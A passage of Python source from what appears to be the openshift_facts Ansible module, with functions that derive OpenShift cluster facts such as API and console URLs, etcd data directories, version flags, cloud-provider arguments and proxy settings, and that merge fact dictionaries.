api_public_hostname = cluster_public_hostname if cluster_public_hostname else public_hostname
console_path = facts['master']['console_path']
etcd_hosts = facts['master']['etcd_hosts']
use_ssl = dict(
api=facts['master']['api_use_ssl'],
public_api=facts['master']['api_use_ssl'],
loopback_api=facts['master']['api_use_ssl'],
console=facts['master']['console_use_ssl'],
public_console=facts['master']['console_use_ssl'],
etcd=facts['master']['etcd_use_ssl']
)
ports = dict(
api=facts['master']['api_port'],
public_api=facts['master']['api_port'],
loopback_api=facts['master']['api_port'],
console=facts['master']['console_port'],
public_console=facts['master']['console_port'],
etcd=facts['master']['etcd_port'],
)
etcd_urls = []
if etcd_hosts != '':
facts['master']['etcd_port'] = ports['etcd']
facts['master']['embedded_etcd'] = False
for host in etcd_hosts:
etcd_urls.append(format_url(use_ssl['etcd'], host,
ports['etcd']))
else:
etcd_urls = [format_url(use_ssl['etcd'], hostname,
ports['etcd'])]
facts['master'].setdefault('etcd_urls', etcd_urls)
prefix_hosts = [('api', api_hostname),
('public_api', api_public_hostname),
('loopback_api', hostname)]
for prefix, host in prefix_hosts:
facts['master'].setdefault(prefix + '_url', format_url(use_ssl[prefix],
host,
ports[prefix]))
r_lhn = "{0}:{1}".format(hostname, ports['api']).replace('.', '-')
r_lhu = "system:openshift-master/{0}:{1}".format(api_hostname, ports['api']).replace('.', '-')
facts['master'].setdefault('loopback_cluster_name', r_lhn)
facts['master'].setdefault('loopback_context_name', "default/{0}/system:openshift-master".format(r_lhn))
facts['master'].setdefault('loopback_user', r_lhu)
prefix_hosts = [('console', api_hostname), ('public_console', api_public_hostname)]
for prefix, host in prefix_hosts:
facts['master'].setdefault(prefix + '_url', format_url(use_ssl[prefix],
host,
ports[prefix],
console_path))
return facts
def set_aggregate_facts(facts):
""" Set aggregate facts
Args:
facts (dict): existing facts
Returns:
dict: the facts dict updated with aggregated facts
"""
all_hostnames = set()
internal_hostnames = set()
kube_svc_ip = first_ip(facts['common']['portal_net'])
if 'common' in facts:
all_hostnames.add(facts['common']['hostname'])
all_hostnames.add(facts['common']['public_hostname'])
all_hostnames.add(facts['common']['ip'])
all_hostnames.add(facts['common']['public_ip'])
facts['common']['kube_svc_ip'] = kube_svc_ip
internal_hostnames.add(facts['common']['hostname'])
internal_hostnames.add(facts['common']['ip'])
cluster_domain = facts['common']['dns_domain']
if 'master' in facts:
if 'cluster_hostname' in facts['master']:
all_hostnames.add(facts['master']['cluster_hostname'])
if 'cluster_public_hostname' in facts['master']:
all_hostnames.add(facts['master']['cluster_public_hostname'])
svc_names = ['openshift', 'openshift.default', 'openshift.default.svc',
'openshift.default.svc.' + cluster_domain, 'kubernetes', 'kubernetes.default',
'kubernetes.default.svc', 'kubernetes.default.svc.' + cluster_domain]
all_hostnames.update(svc_names)
internal_hostnames.update(svc_names)
all_hostnames.add(kube_svc_ip)
internal_hostnames.add(kube_svc_ip)
facts['common']['all_hostnames'] = list(all_hostnames)
facts['common']['internal_hostnames'] = list(internal_hostnames)
return facts
def set_etcd_facts_if_unset(facts):
"""
If using embedded etcd, loads the data directory from master-config.yaml.
If using standalone etcd, loads ETCD_DATA_DIR from etcd.conf.
If anything goes wrong parsing these, the fact will not be set.
"""
if 'master' in facts and safe_get_bool(facts['master']['embedded_etcd']):
etcd_facts = facts['etcd'] if 'etcd' in facts else dict()
if 'etcd_data_dir' not in etcd_facts:
try:
# Parse master config to find actual etcd data dir:
master_cfg_path = os.path.join(facts['common']['config_base'],
'master/master-config.yaml')
master_cfg_f = open(master_cfg_path, 'r')
config = yaml.safe_load(master_cfg_f.read())
master_cfg_f.close()
etcd_facts['etcd_data_dir'] = \
config['etcdConfig']['storageDirectory']
facts['etcd'] = etcd_facts
# We don't want exceptions bubbling up here:
# pylint: disable=broad-except
except Exception:
pass
else:
etcd_facts = facts['etcd'] if 'etcd' in facts else dict()
# Read ETCD_DATA_DIR from /etc/etcd/etcd.conf:
try:
# Add a fake section for parsing:
ini_str = text_type('[root]\n' + open('/etc/etcd/etcd.conf', 'r').read(), 'utf-8')
ini_fp = io.StringIO(ini_str)
config = configparser.RawConfigParser()
config.readfp(ini_fp)
etcd_data_dir = config.get('root', 'ETCD_DATA_DIR')
if etcd_data_dir.startswith('"') and etcd_data_dir.endswith('"'):
etcd_data_dir = etcd_data_dir[1:-1]
etcd_facts['etcd_data_dir'] = etcd_data_dir
facts['etcd'] = etcd_facts
# We don't want exceptions bubbling up here:
# pylint: disable=broad-except
except Exception:
pass
return facts
def set_deployment_facts_if_unset(facts):
""" Set Facts that vary based on deployment_type. This currently
includes common.service_type, master.registry_url, node.registry_url,
node.storage_plugin_deps
Args:
facts (dict): existing facts
Returns:
dict: the facts dict updated with the generated deployment_type
facts
"""
# disabled to avoid breaking up facts related to deployment type into
# multiple methods for now.
# pylint: disable=too-many-statements, too-many-branches
if 'common' in facts:
deployment_type = facts['common']['deployment_type']
if 'service_type' not in facts['common']:
service_type = 'atomic-openshift'
if deployment_type == 'origin':
service_type = 'origin'
facts['common']['service_type'] = service_type
if 'docker' in facts:
deployment_type = facts['common']['deployment_type']
if deployment_type == 'openshift-enterprise':
addtl_regs = facts['docker'].get('additional_registries', [])
ent_reg = 'registry.access.redhat.com'
if ent_reg not in addtl_regs:
facts['docker']['additional_registries'] = addtl_regs + [ent_reg]
for role in ('master', 'node'):
if role in facts:
deployment_type = facts['common']['deployment_type']
if 'registry_url' not in facts[role]:
registry_url = 'openshift/origin-${component}:${version}'
if deployment_type == 'openshift-enterprise':
registry_url = 'openshift3/ose-${component}:${version}'
facts[role]['registry_url'] = registry_url
if 'master' in facts:
deployment_type = facts['common']['deployment_type']
openshift_features = ['Builder', 'S2IBuilder', 'WebConsole']
if 'disabled_features' not in facts['master']:
if facts['common']['deployment_subtype'] == 'registry':
facts['master']['disabled_features'] = openshift_features
if 'node' in facts:
deployment_type = facts['common']['deployment_type']
if 'storage_plugin_deps' not in facts['node']:
facts['node']['storage_plugin_deps'] = ['ceph', 'glusterfs', 'iscsi']
return facts
# pylint: disable=too-many-statements
def set_version_facts_if_unset(facts):
""" Set version facts. This currently includes common.version and
common.version_gte_3_1_or_1_1.
Args:
facts (dict): existing facts
Returns:
dict: the facts dict updated with version facts.
"""
if 'common' in facts:
deployment_type = facts['common']['deployment_type']
openshift_version = get_openshift_version(facts)
if openshift_version and openshift_version != "latest":
version = LooseVersion(openshift_version)
facts['common']['version'] = openshift_version
facts['common']['short_version'] = '.'.join([str(x) for x in version.version[0:2]])
if deployment_type == 'origin':
version_gte_3_1_or_1_1 = version >= LooseVersion('1.1.0')
version_gte_3_1_1_or_1_1_1 = version >= LooseVersion('1.1.1')
version_gte_3_2_or_1_2 = version >= LooseVersion('1.2.0')
version_gte_3_3_or_1_3 = version >= LooseVersion('1.3.0')
version_gte_3_4_or_1_4 = version >= LooseVersion('1.4')
version_gte_3_5_or_1_5 = version >= LooseVersion('1.5')
version_gte_3_6 = version >= LooseVersion('3.6')
version_gte_3_7 = version >= LooseVersion('3.7')
else:
version_gte_3_1_or_1_1 = version >= LooseVersion('3.0.2.905')
version_gte_3_1_1_or_1_1_1 = version >= LooseVersion('3.1.1')
version_gte_3_2_or_1_2 = version >= LooseVersion('3.1.1.901')
version_gte_3_3_or_1_3 = version >= LooseVersion('3.3.0')
version_gte_3_4_or_1_4 = version >= LooseVersion('3.4')
version_gte_3_5_or_1_5 = version >= LooseVersion('3.5')
version_gte_3_6 = version >= LooseVersion('3.6')
version_gte_3_7 = version >= LooseVersion('3.7')
else:
# 'Latest' version is set to True, 'Next' versions set to False
version_gte_3_1_or_1_1 = True
version_gte_3_1_1_or_1_1_1 = True
version_gte_3_2_or_1_2 = True
version_gte_3_3_or_1_3 = True
version_gte_3_4_or_1_4 = True
version_gte_3_5_or_1_5 = True
version_gte_3_6 = True
version_gte_3_7 = False
facts['common']['version_gte_3_1_or_1_1'] = version_gte_3_1_or_1_1
facts['common']['version_gte_3_1_1_or_1_1_1'] = version_gte_3_1_1_or_1_1_1
facts['common']['version_gte_3_2_or_1_2'] = version_gte_3_2_or_1_2
facts['common']['version_gte_3_3_or_1_3'] = version_gte_3_3_or_1_3
facts['common']['version_gte_3_4_or_1_4'] = version_gte_3_4_or_1_4
facts['common']['version_gte_3_5_or_1_5'] = version_gte_3_5_or_1_5
facts['common']['version_gte_3_6'] = version_gte_3_6
facts['common']['version_gte_3_7'] = version_gte_3_7
if version_gte_3_7:
examples_content_version = 'v3.7'
elif version_gte_3_6:
examples_content_version = 'v3.6'
elif version_gte_3_5_or_1_5:
examples_content_version = 'v1.5'
elif version_gte_3_4_or_1_4:
examples_content_version = 'v1.4'
elif version_gte_3_3_or_1_3:
examples_content_version = 'v1.3'
elif version_gte_3_2_or_1_2:
examples_content_version = 'v1.2'
elif version_gte_3_1_or_1_1:
examples_content_version = 'v1.1'
else:
examples_content_version = 'v1.0'
facts['common']['examples_content_version'] = examples_content_version
return facts
def set_sdn_facts_if_unset(facts, system_facts):
""" Set sdn facts if not already present in facts dict
Args:
facts (dict): existing facts
system_facts (dict): ansible_facts
Returns:
dict: the facts dict updated with the generated sdn facts if they
were not already present
"""
if 'master' in facts:
# set defaults for sdn_cluster_network_cidr and sdn_host_subnet_length
# these might be overridden if they exist in the master config file
sdn_cluster_network_cidr = '10.128.0.0/14'
sdn_host_subnet_length = '9'
master_cfg_path = os.path.join(facts['common']['config_base'],
'master/master-config.yaml')
if os.path.isfile(master_cfg_path):
with open(master_cfg_path, 'r') as master_cfg_f:
config = yaml.safe_load(master_cfg_f.read())
if 'networkConfig' in config:
if 'clusterNetworkCIDR' in config['networkConfig']:
sdn_cluster_network_cidr = \
config['networkConfig']['clusterNetworkCIDR']
if 'hostSubnetLength' in config['networkConfig']:
sdn_host_subnet_length = \
config['networkConfig']['hostSubnetLength']
if 'sdn_cluster_network_cidr' not in facts['master']:
facts['master']['sdn_cluster_network_cidr'] = sdn_cluster_network_cidr
if 'sdn_host_subnet_length' not in facts['master']:
facts['master']['sdn_host_subnet_length'] = sdn_host_subnet_length
if 'node' in facts and 'sdn_mtu' not in facts['node']:
node_ip = facts['common']['ip']
# default MTU if interface MTU cannot be detected
facts['node']['sdn_mtu'] = '1450'
for val in itervalues(system_facts):
if isinstance(val, dict) and 'mtu' in val:
mtu = val['mtu']
if 'ipv4' in val and val['ipv4'].get('address') == node_ip:
facts['node']['sdn_mtu'] = str(mtu - 50)
return facts
def set_nodename(facts):
""" set nodename """
if 'node' in facts and 'common' in facts:
if 'cloudprovider' in facts and facts['cloudprovider']['kind'] == 'gce':
facts['node']['nodename'] = facts['provider']['metadata']['instance']['hostname'].split('.')[0]
# TODO: The openstack cloudprovider nodename setting was too opinionaed.
# It needs to be generalized before it can be enabled again.
# elif 'cloudprovider' in facts and facts['cloudprovider']['kind'] == 'openstack':
# facts['node']['nodename'] = facts['provider']['metadata']['hostname'].replace('.novalocal', '')
else:
facts['node']['nodename'] = facts['common']['hostname'].lower()
return facts
def migrate_oauth_template_facts(facts):
"""
Migrate an old oauth template fact to a newer format if it's present.
The legacy 'oauth_template' fact was just a filename, and assumed you were
setting the 'login' template.
The new pluralized 'oauth_templates' fact is a dict mapping the template
name to a filename.
Simplify the code after this by merging the old fact into the new.
"""
if 'master' in facts and 'oauth_template' in facts['master']:
if 'oauth_templates' not in facts['master']:
facts['master']['oauth_templates'] = {"login": facts['master']['oauth_template']}
elif 'login' not in facts['master']['oauth_templates']:
facts['master']['oauth_templates']['login'] = facts['master']['oauth_template']
return facts
def format_url(use_ssl, hostname, port, path=''):
""" Format url based on ssl flag, hostname, port and path
Args:
use_ssl (bool): is ssl enabled
hostname (str): hostname
port (str): port
path (str): url path
Returns:
str: The generated url string
"""
scheme = 'https' if use_ssl else 'http'
netloc = hostname
if (use_ssl and port != '443') or (not use_ssl and port != '80'):
netloc += ":%s" % port
try:
url = urlparse.urlunparse((scheme, netloc, path, '', '', ''))
except AttributeError:
# pylint: disable=undefined-variable
url = urlunparse((scheme, netloc, path, '', '', ''))
return url
def get_current_config(facts):
""" Get current openshift config
Args:
facts (dict): existing facts
Returns:
dict: the facts dict updated with the current openshift config
"""
current_config = dict()
roles = [role for role in facts if role not in ['common', 'provider']]
for role in roles:
if 'roles' in current_config:
current_config['roles'].append(role)
else:
current_config['roles'] = [role]
# TODO: parse the /etc/sysconfig/openshift-{master,node} config to
# determine the location of files.
# TODO: I suspect this isn't working right now, but it doesn't prevent
# anything from working properly as far as I can tell, perhaps because
# we override the kubeconfig path everywhere we use it?
# Query kubeconfig settings
kubeconfig_dir = '/var/lib/origin/openshift.local.certificates'
if role == 'node':
kubeconfig_dir = os.path.join(
kubeconfig_dir, "node-%s" % facts['common']['hostname']
)
kubeconfig_path = os.path.join(kubeconfig_dir, '.kubeconfig')
if os.path.isfile('/usr/bin/openshift') and os.path.isfile(kubeconfig_path):
try:
_, output, _ = module.run_command( # noqa: F405
["/usr/bin/openshift", "ex", "config", "view", "-o",
"json", "--kubeconfig=%s" % kubeconfig_path],
check_rc=False
)
config = json.loads(output)
cad = 'certificate-authority-data'
try:
for cluster in config['clusters']:
config['clusters'][cluster][cad] = 'masked'
except KeyError:
pass
try:
for user in config['users']:
config['users'][user][cad] = 'masked'
config['users'][user]['client-key-data'] = 'masked'
except KeyError:
pass
current_config['kubeconfig'] = config
# override pylint broad-except warning, since we do not want
# to bubble up any exceptions if oc config view
# fails
# pylint: disable=broad-except
except Exception:
pass
return current_config
def build_kubelet_args(facts):
"""Build node kubelet_args
In the node-config.yaml file, kubeletArgument sub-keys have their
values provided as a list. Hence the gratuitous use of ['foo'] below.
"""
cloud_cfg_path = os.path.join(
facts['common']['config_base'],
'cloudprovider')
# We only have to do this stuff on hosts that are nodes
if 'node' in facts:
# Any changes to the kubeletArguments parameter are stored
# here first.
kubelet_args = {}
if 'cloudprovider' in facts:
# EVERY cloud is special <3
if 'kind' in facts['cloudprovider']:
if facts['cloudprovider']['kind'] == 'aws':
kubelet_args['cloud-provider'] = ['aws']
kubelet_args['cloud-config'] = [cloud_cfg_path + '/aws.conf']
if facts['cloudprovider']['kind'] == 'openstack':
kubelet_args['cloud-provider'] = ['openstack']
kubelet_args['cloud-config'] = [cloud_cfg_path + '/openstack.conf']
if facts['cloudprovider']['kind'] == 'gce':
kubelet_args['cloud-provider'] = ['gce']
kubelet_args['cloud-config'] = [cloud_cfg_path + '/gce.conf']
# Automatically add node-labels to the kubeletArguments
# parameter. See BZ1359848 for additional details.
#
# Ref: https://bugzilla.redhat.com/show_bug.cgi?id=1359848
if 'labels' in facts['node'] and isinstance(facts['node']['labels'], dict):
# tl;dr: os_node_labels="{'foo': 'bar', 'a': 'b'}" turns
# into ['foo=bar', 'a=b']
#
# On the openshift_node_labels inventory variable we loop
# over each key-value tuple (from .items()) and join the
# key to the value with an '=' character, this produces a
# list.
#
# map() seems to be returning an itertools.imap object
# instead of a list. We cast it to a list ourselves.
# pylint: disable=unnecessary-lambda
labels_str = list(map(lambda x: '='.join(x), facts['node']['labels'].items()))
if labels_str != '':
kubelet_args['node-labels'] = labels_str
# If we've added items to the kubelet_args dict then we need
# to merge the new items back into the main facts object.
if kubelet_args != {}:
facts = merge_facts({'node': {'kubelet_args': kubelet_args}}, facts, [], [])
return facts
def build_controller_args(facts):
""" Build master controller_args """
cloud_cfg_path = os.path.join(facts['common']['config_base'],
'cloudprovider')
if 'master' in facts:
controller_args = {}
if 'cloudprovider' in facts:
if 'kind' in facts['cloudprovider']:
if facts['cloudprovider']['kind'] == 'aws':
controller_args['cloud-provider'] = ['aws']
controller_args['cloud-config'] = [cloud_cfg_path + '/aws.conf']
if facts['cloudprovider']['kind'] == 'openstack':
controller_args['cloud-provider'] = ['openstack']
controller_args['cloud-config'] = [cloud_cfg_path + '/openstack.conf']
if facts['cloudprovider']['kind'] == 'gce':
controller_args['cloud-provider'] = ['gce']
controller_args['cloud-config'] = [cloud_cfg_path + '/gce.conf']
if controller_args != {}:
facts = merge_facts({'master': {'controller_args': controller_args}}, facts, [], [])
return facts
def build_api_server_args(facts):
""" Build master api_server_args """
cloud_cfg_path = os.path.join(facts['common']['config_base'],
'cloudprovider')
if 'master' in facts:
api_server_args = {}
if 'cloudprovider' in facts:
if 'kind' in facts['cloudprovider']:
if facts['cloudprovider']['kind'] == 'aws':
api_server_args['cloud-provider'] = ['aws']
api_server_args['cloud-config'] = [cloud_cfg_path + '/aws.conf']
if facts['cloudprovider']['kind'] == 'openstack':
api_server_args['cloud-provider'] = ['openstack']
api_server_args['cloud-config'] = [cloud_cfg_path + '/openstack.conf']
if facts['cloudprovider']['kind'] == 'gce':
api_server_args['cloud-provider'] = ['gce']
api_server_args['cloud-config'] = [cloud_cfg_path + '/gce.conf']
if api_server_args != {}:
facts = merge_facts({'master': {'api_server_args': api_server_args}}, facts, [], [])
return facts
def is_service_running(service):
""" Queries systemd through dbus to see if the service is running """
service_running = False
try:
bus = SystemBus()
systemd = bus.get_object('org.freedesktop.systemd1', '/org/freedesktop/systemd1')
manager = Interface(systemd, dbus_interface='org.freedesktop.systemd1.Manager')
service_unit = service if service.endswith('.service') else manager.GetUnit('{0}.service'.format(service))
service_proxy = bus.get_object('org.freedesktop.systemd1', str(service_unit))
service_properties = Interface(service_proxy, dbus_interface='org.freedesktop.DBus.Properties')
service_load_state = service_properties.Get('org.freedesktop.systemd1.Unit', 'LoadState')
service_active_state = service_properties.Get('org.freedesktop.systemd1.Unit', 'ActiveState')
if service_load_state == 'loaded' and service_active_state == 'active':
service_running = True
except DBusException:
# TODO: do not swallow exception, as it may be hiding useful debugging
# information.
pass
return service_running
def rpm_rebuilddb():
"""
Runs rpm --rebuilddb to ensure the db is in good shape.
"""
module.run_command(['/usr/bin/rpm', '--rebuilddb']) # noqa: F405
def get_version_output(binary, version_cmd):
""" runs and returns the version output for a command """
cmd = []
for item in (binary, version_cmd):
if isinstance(item, list):
cmd.extend(item)
else:
cmd.append(item)
if os.path.isfile(cmd[0]):
_, output, _ = module.run_command(cmd) # noqa: F405
return output
def get_docker_version_info():
""" Parses and returns the docker version info """
result = None
if is_service_running('docker') or is_service_running('container-engine'):
version_info = yaml.safe_load(get_version_output('/usr/bin/docker', 'version'))
if 'Server' in version_info:
result = {
'api_version': version_info['Server']['API version'],
'version': version_info['Server']['Version']
}
return result
def get_hosted_registry_insecure():
""" Parses OPTIONS from /etc/sysconfig/docker to determine if the
registry is currently insecure.
"""
hosted_registry_insecure = None
if os.path.exists('/etc/sysconfig/docker'):
try:
ini_str = text_type('[root]\n' + open('/etc/sysconfig/docker', 'r').read(), 'utf-8')
ini_fp = io.StringIO(ini_str)
config = configparser.RawConfigParser()
config.readfp(ini_fp)
options = config.get('root', 'OPTIONS')
if 'insecure-registry' in options:
hosted_registry_insecure = True
except Exception: # pylint: disable=broad-except
pass
return hosted_registry_insecure
def get_openshift_version(facts):
""" Get current version of openshift on the host.
Checks a variety of ways ranging from fastest to slowest.
Args:
facts (dict): existing facts
optional cli_image for pulling the version number
Returns:
version: the current openshift version
"""
version = None
# No need to run this method repeatedly on a system if we already know the
# version
# TODO: We need a way to force reload this after upgrading bits.
if 'common' in facts:
if 'version' in facts['common'] and facts['common']['version'] is not None:
return chomp_commit_offset(facts['common']['version'])
if os.path.isfile('/usr/bin/openshift'):
_, output, _ = module.run_command(['/usr/bin/openshift', 'version']) # noqa: F405
version = parse_openshift_version(output)
elif 'common' in facts and 'is_containerized' in facts['common']:
version = get_container_openshift_version(facts)
# Handle containerized masters that have not yet been configured as a node.
# This can be very slow and may get re-run multiple times, so we only use this
# if other methods failed to find a version.
if not version and os.path.isfile('/usr/local/bin/openshift'):
_, output, _ = module.run_command(['/usr/local/bin/openshift', 'version']) # noqa: F405
version = parse_openshift_version(output)
return chomp_commit_offset(version)
def chomp_commit_offset(version):
"""Chomp any "+git.foo" commit offset string from the given `version`
and return the modified version string.
Ex:
- chomp_commit_offset(None) => None
- chomp_commit_offset(1337) => "1337"
- chomp_commit_offset("v3.4.0.15+git.derp") => "v3.4.0.15"
- chomp_commit_offset("v3.4.0.15") => "v3.4.0.15"
- chomp_commit_offset("v1.3.0+52492b4") => "v1.3.0"
"""
if version is None:
return version
else:
# Stringify, just in case it's a Number type. Split by '+' and
# return the first split. No concerns about strings without a
# '+', .split() returns an array of the original string.
return str(version).split('+')[0]
def get_container_openshift_version(facts):
"""
If containerized, see if we can determine the installed version via the
systemd environment files.
"""
for filename in ['/etc/sysconfig/%s-master', '/etc/sysconfig/%s-node']:
env_path = filename % facts['common']['service_type']
if not os.path.exists(env_path):
continue
with open(env_path) as env_file:
for line in env_file:
if line.startswith("IMAGE_VERSION="):
tag = line[len("IMAGE_VERSION="):].strip()
# Remove leading "v" and any trailing release info, we just want
# a version number here:
no_v_version = tag[1:] if tag[0] == 'v' else tag
version = no_v_version.split("-")[0]
return version
return None
def parse_openshift_version(output):
""" Apply provider facts to supplied facts dict
Args:
string: output of 'openshift version'
Returns:
string: the version number
"""
versions = dict(e.split(' v') for e in output.splitlines() if ' v' in e)
ver = versions.get('openshift', '')
# Remove trailing build number and commit hash from older versions, we need to return a straight
# w.x.y.z version here for use as openshift_version throughout the playbooks/roles. (i.e. 3.1.1.6-64-g80b61da)
ver = ver.split('-')[0]
return ver
def apply_provider_facts(facts, provider_facts):
""" Apply provider facts to supplied facts dict
Args:
facts (dict): facts dict to update
provider_facts (dict): provider facts to apply
roles: host roles
Returns:
dict: the merged facts
"""
if not provider_facts:
return facts
common_vars = [('hostname', 'ip'), ('public_hostname', 'public_ip')]
for h_var, ip_var in common_vars:
ip_value = provider_facts['network'].get(ip_var)
if ip_value:
facts['common'][ip_var] = ip_value
facts['common'][h_var] = choose_hostname(
[provider_facts['network'].get(h_var)],
facts['common'][h_var]
)
facts['provider'] = provider_facts
return facts
# Disabling pylint too many branches. This function needs refactored
# but is a very core part of openshift_facts.
# pylint: disable=too-many-branches, too-many-nested-blocks
def merge_facts(orig, new, additive_facts_to_overwrite, protected_facts_to_overwrite):
""" Recursively merge facts dicts
Args:
orig (dict): existing facts
new (dict): facts to update
additive_facts_to_overwrite (list): additive facts to overwrite in jinja
'.' notation ex: ['master.named_certificates']
protected_facts_to_overwrite (list): protected facts to overwrite in jinja
'.' notation ex: ['master.master_count']
Returns:
dict: the merged facts
"""
additive_facts = ['named_certificates']
protected_facts = ['ha']
# Facts we do not ever want to merge. These originate in inventory variables
# and contain JSON dicts. We don't ever want to trigger a merge
# here, just completely overwrite with the new if they are present there.
inventory_json_facts = ['admission_plugin_config',
'kube_admission_plugin_config',
'image_policy_config',
"builddefaults",
"buildoverrides"]
facts = dict()
for key, value in iteritems(orig):
# Key exists in both old and new facts.
if key in new:
if key in inventory_json_facts:
# Watchout for JSON facts that sometimes load as strings.
# (can happen if the JSON contains a boolean)
if isinstance(new[key], string_types):
facts[key] = yaml.safe_load(new[key])
else:
facts[key] = copy.deepcopy(new[key])
# Continue to recurse if old and new fact is a dictionary.
elif isinstance(value, dict) and isinstance(new[key], dict):
# Collect the subset of additive facts to overwrite if
# key matches. These will be passed to the subsequent
# merge_facts call.
relevant_additive_facts = []
for item in additive_facts_to_overwrite:
if '.' in item and item.startswith(key + '.'):
relevant_additive_facts.append(item)
# Collect the subset of protected facts to overwrite
# if key matches. These will be passed to the
# subsequent merge_facts call.
relevant_protected_facts = []
for item in protected_facts_to_overwrite:
if '.' in item and item.startswith(key + '.'):
relevant_protected_facts.append(item)
facts[key] = merge_facts(value, new[key], relevant_additive_facts, relevant_protected_facts)
# Key matches an additive fact and we are not overwriting
# it so we will append the new value to the existing value.
elif key in additive_facts and key not in [x.split('.')[-1] for x in additive_facts_to_overwrite]:
if isinstance(value, list) and isinstance(new[key], list):
new_fact = []
for item in copy.deepcopy(value) + copy.deepcopy(new[key]):
if item not in new_fact:
new_fact.append(item)
facts[key] = new_fact
# Key matches a protected fact and we are not overwriting
# it so we will determine if it is okay to change this
# fact.
elif key in protected_facts and key not in [x.split('.')[-1] for x in protected_facts_to_overwrite]:
# ha (bool) can not change unless it has been passed
# as a protected fact to overwrite.
if key == 'ha':
if safe_get_bool(value) != safe_get_bool(new[key]):
# pylint: disable=line-too-long
module.fail_json(msg='openshift_facts received a different value for openshift.master.ha') # noqa: F405
else:
facts[key] = value
# No other condition has been met. Overwrite the old fact
# with the new value.
else:
facts[key] = copy.deepcopy(new[key])
# Key isn't in new so add it to facts to keep it.
else:
facts[key] = copy.deepcopy(value)
new_keys = set(new.keys()) - set(orig.keys())
for key in new_keys:
# Watchout for JSON facts that sometimes load as strings.
# (can happen if the JSON contains a boolean)
if key in inventory_json_facts and isinstance(new[key], string_types):
facts[key] = yaml.safe_load(new[key])
else:
facts[key] = copy.deepcopy(new[key])
return facts
def save_local_facts(filename, facts):
""" Save local facts
Args:
filename (str): local facts file
facts (dict): facts to set
"""
try:
fact_dir = os.path.dirname(filename)
try:
os.makedirs(fact_dir) # try to make the directory
except OSError as exception:
if exception.errno != errno.EEXIST: # but it is okay if it is already there
raise # pass any other exceptions up the chain
with open(filename, 'w') as fact_file:
fact_file.write(module.jsonify(facts)) # noqa: F405
os.chmod(filename, 0o600)
except (IOError, OSError) as ex:
raise OpenShiftFactsFileWriteError(
"Could not create fact file: %s, error: %s" % (filename, ex)
)
def get_local_facts_from_file(filename):
""" Retrieve local facts from fact file
Args:
filename (str): local facts file
Returns:
dict: the retrieved facts
"""
local_facts = dict()
try:
# Handle conversion of INI style facts file to json style
ini_facts = configparser.SafeConfigParser()
ini_facts.read(filename)
for section in ini_facts.sections():
local_facts[section] = dict()
for key, value in ini_facts.items(section):
local_facts[section][key] = value
except (configparser.MissingSectionHeaderError,
configparser.ParsingError):
try:
with open(filename, 'r') as facts_file:
local_facts = json.load(facts_file)
except (ValueError, IOError):
pass
return local_facts
def sort_unique(alist):
""" Sorts and de-dupes a list
Args:
list: a list
Returns:
list: a sorted de-duped list
"""
return sorted(list(set(alist)))
def safe_get_bool(fact):
""" Get a boolean fact safely.
Args:
facts: fact to convert
Returns:
bool: given fact as a bool
"""
return bool(strtobool(str(fact)))
def set_proxy_facts(facts):
""" Set global proxy facts
Args:
facts(dict): existing facts
Returns:
facts(dict): Updated facts with missing values
"""
if 'common' in facts:
common = facts['common']
if 'http_proxy' in common or 'https_proxy' in common or 'no_proxy' in common:
if 'no_proxy' in common and isinstance(common['no_proxy'], string_types):
common['no_proxy'] = common['no_proxy'].split(",")
elif 'no_proxy' not in common:
common['no_proxy'] = []
# See https://bugzilla.redhat.com/show_bug.cgi?id=1466783
# masters behind a proxy need to connect to etcd via IP
if 'no_proxy_etcd_host_ips' in common:
if isinstance(common['no_proxy_etcd_host_ips'], string_types):
common['no_proxy'].extend(common['no_proxy_etcd_host_ips'].split(','))
if 'generate_no_proxy_hosts' in common and safe_get_bool(common['generate_no_proxy_hosts']):
if 'no_proxy_internal_hostnames' in common:
common['no_proxy'].extend(common['no_proxy_internal_hostnames'].split(','))
# We always add local dns domain and ourselves no matter what
common['no_proxy'].append('.' + common['dns_domain'])
common['no_proxy'].append('.svc')
common['no_proxy'].append(common['hostname'])
common['no_proxy'] = ','.join(sort_unique(common['no_proxy']))
facts['common'] = common
return facts
def set_builddefaults_facts(facts):
""" Set build defaults including setting proxy values from http_proxy, https_proxy,
no_proxy to the more specific builddefaults and builddefaults_git vars.
1. http_proxy, https_proxy, no_proxy
2. builddefaults_*
3. builddefaults_git_*
Args:
facts(dict): existing facts
Returns:
facts(dict): Updated facts with missing values
"""
if 'builddefaults' in facts:
builddefaults = facts['builddefaults']
common = facts['common']
# Copy values from common to builddefaults
if 'http_proxy' not in builddefaults and 'http_proxy' in common:
builddefaults['http_proxy'] = common['http_proxy']
if 'https_proxy' not in builddefaults and 'https_proxy' in common:
builddefaults['https_proxy'] = common['https_proxy']
if 'no_proxy' not in builddefaults and 'no_proxy' in common:
builddefaults['no_proxy'] = common['no_proxy']
# Create git specific facts from generic values, if git specific values are
# not defined.
if 'git_http_proxy' not in builddefaults and 'http_proxy' in builddefaults:
builddefaults['git_http_proxy'] = builddefaults['http_proxy']
if 'git_https_proxy' not in builddefaults and 'https_proxy' in builddefaults:
builddefaults['git_https_proxy'] = builddefaults['https_proxy']
if 'git_no_proxy' not in builddefaults and 'no_proxy' in builddefaults:
builddefaults['git_no_proxy'] = builddefaults['no_proxy']
# If we're actually defining a builddefaults config then create admission_plugin_config
# then merge builddefaults[config] structure into admission_plugin_config
# 'config' is the 'openshift_builddefaults_json' inventory variable
if 'config' in builddefaults:
if 'admission_plugin_config' not in facts['master']:
# Scaffold out the full expected datastructure
facts['master']['admission_plugin_config'] = {'BuildDefaults': {'configuration': {'env': {}}}}
facts['master']['admission_plugin_config'].update(builddefaults['config'])
delete_empty_keys(facts['master']['admission_plugin_config']['BuildDefaults']['configuration']['env'])
return facts
def delete_empty_keys(keylist):
""" Delete dictionary elements from keylist where "value" is empty.
Args:
keylist(list): A list of builddefault configuration envs.
Returns:
none
Example:
keylist = [{'name': 'HTTP_PROXY', 'value': 'http://file.rdu.redhat.com:3128'},
{'name': 'HTTPS_PROXY', 'value': 'http://file.rdu.redhat.com:3128'},
{'name': 'NO_PROXY', 'value': ''}]
After calling delete_empty_keys the provided list is modified to become:
[{'name': 'HTTP_PROXY', 'value': 'http://file.rdu.redhat.com:3128'},
{'name': 'HTTPS_PROXY', 'value': 'http://file.rdu.redhat.com:3128'}]
"""
count = 0
for i in range(0, len(keylist)):
if len(keylist[i - count]['value']) == 0:
del keylist[i - count]
count += 1
def set_buildoverrides_facts(facts):
""" Set build overrides
Args:
facts(dict): existing facts
Returns:
facts(dict): Updated facts with missing values
"""
if 'buildoverrides' in facts:
buildoverrides = facts['buildoverrides']
